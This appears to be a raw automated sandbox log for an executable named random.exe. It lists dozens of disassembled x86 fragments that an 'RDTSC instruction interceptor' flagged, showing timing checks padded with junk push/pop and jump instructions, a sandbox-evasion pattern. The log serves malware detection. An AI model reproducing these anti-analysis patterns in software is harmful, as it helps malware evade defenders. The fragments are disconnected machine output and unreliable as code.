Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E4EA second address: B8E566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 ja 00007FBC8CC0CD36h 0x0000000e pop edx 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FBC8CC0CD38h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+12471438h] 0x00000033 mov edx, dword ptr [ebp+122D367Dh] 0x00000039 add eax, ebx 0x0000003b ja 00007FBC8CC0CD42h 0x00000041 nop 0x00000042 jg 00007FBC8CC0CD4Bh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b js 00007FBC8CC0CD38h 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E566 second address: B8E570 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC8CB4EEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E570 second address: B8E5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 adc ecx, 3F553D1Ah 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FBC8CC0CD38h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 nop 0x0000002a push esi 0x0000002b jnp 00007FBC8CC0CD4Eh 0x00000031 jmp 00007FBC8CC0CD48h 0x00000036 pop esi 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E5C3 second address: B8E5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEF5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E5DD second address: B8E5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CC0CD3Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE8186 second address: BE818A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BEEADC second address: BEEAF1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC8CC0CD36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d jg 00007FBC8CC0CD36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BEDDDA second address: BEDDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BEE2BE second address: BEE2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBC8CC0CD36h 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FBC8CC0CD44h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBC8CC0CD45h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF47CA second address: BF47CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF493C second address: BF4948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF4948 second address: BF494E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5043 second address: BF5052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007FBC8CC0CD36h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5052 second address: BF5078 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC8CB4EEF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBC8CB4EEEBh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5078 second address: BF5082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBC8CC0CD36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5082 second address: BF5086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF52FE second address: BF532C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CC0CD48h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FBC8CC0CD3Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF56B3 second address: BF56CC instructions: 0x00000000 rdtsc 0x00000002 js 00007FBC8CB4EEECh 0x00000008 jo 00007FBC8CB4EEE6h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 je 00007FBC8CB4EEE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF56CC second address: BF56D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF593A second address: BF5947 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5947 second address: BF5952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5952 second address: BF5958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5958 second address: BF596D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBC8CC0CD36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d jno 00007FBC8CC0CD36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5C6F second address: BF5C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5C73 second address: BF5C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5C77 second address: BF5C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5C9C second address: BF5CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF5F8B second address: BF5F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBC8CB4EEEBh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF6573 second address: BF6583 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBC8CC0CD36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BF6583 second address: BF6587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFA9BA second address: BFA9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFA9BE second address: BFA9C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBC8CB4EEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFACA1 second address: BFACB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FBC8CC0CD36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFACB3 second address: BFACC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFB0FD second address: BFB106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFB106 second address: BFB10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFB10C second address: BFB110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BFB110 second address: BFB114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C00498 second address: C0049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C0049E second address: C004B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBC8CB4EEE6h 0x0000000a popad 0x0000000b jc 00007FBC8CB4EEEEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C0879C second address: C087A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C087A0 second address: C087B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBC8CB4EEEEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C087B6 second address: C087CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FBC8CC0CD3Ah 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C087CB second address: C087DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FBC8CB4EEECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C087DC second address: C087E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C087E0 second address: C087F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBC8CB4EEEAh 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C087F3 second address: C087F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C06A3F second address: C06A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push esi 0x00000007 je 00007FBC8CB4EEEEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C06A50 second address: C06A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007FBC8CC0CD36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C0727F second address: C0729A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C0787C second address: C078A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBC8CC0CD4Ch 0x0000000a jmp 00007FBC8CC0CD46h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C078A0 second address: C078A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C078A4 second address: C078B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FBC8CC0CD3Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C07F4B second address: C07F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C06568 second address: C06589 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C06589 second address: C065A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C0C6D4 second address: C0C6E2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBC8CC0CD38h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C0C6E2 second address: C0C6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C11727 second address: C11751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FBC8CC0CD46h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C11113 second address: C11128 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC8CB4EEE6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FBC8CB4EEECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C1141E second address: C11422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C11422 second address: C11428 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C1C265 second address: C1C26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C1EBAF second address: C1EBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C25EAE second address: C25ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FBC8CC0CD46h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C2EC02 second address: C2EC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C2EC06 second address: C2EC14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBC8CC0CD38h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C2EC14 second address: C2EC19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C35CD0 second address: C35CF7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC8CC0CD4Ch 0x00000008 jmp 00007FBC8CC0CD44h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007FBC8CC0CD36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C35CF7 second address: C35D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEF4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C38381 second address: C38387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C381C1 second address: C381C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C381C5 second address: C381E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CC0CD46h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C381E1 second address: C3821D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FBC8CB4EEE6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jo 00007FBC8CB4EEE6h 0x00000011 popad 0x00000012 jmp 00007FBC8CB4EEF1h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBC8CB4EEEBh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jns 00007FBC8CB4EEE6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C3821D second address: C38223 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C38223 second address: C38235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CB4EEEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C38235 second address: C38239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C399EB second address: C399F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C399F1 second address: C399F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C3F1F7 second address: C3F1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C3F56A second address: C3F574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C3F574 second address: C3F579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C4524D second address: C45251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C53877 second address: C5387D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C5387D second address: C53887 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBC8CC0CD36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C53887 second address: C5388D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C4F087 second address: C4F0B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBC8CC0CD3Ah 0x0000000f pushad 0x00000010 jmp 00007FBC8CC0CD3Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C61C26 second address: C61C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FBC8CB4EEF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FBC8CB4EEF6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C61C66 second address: C61C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C61C81 second address: C61C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C78F16 second address: C78F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C78F1A second address: C78F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C78F1E second address: C78F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FBC8CC0CD42h 0x0000000c jl 00007FBC8CC0CD36h 0x00000012 jc 00007FBC8CC0CD36h 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jne 00007FBC8CC0CD3Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C77E7D second address: C77E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C77E81 second address: C77E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBC8CC0CD36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C78155 second address: C78161 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC8CB4EEE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C782F7 second address: C782FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
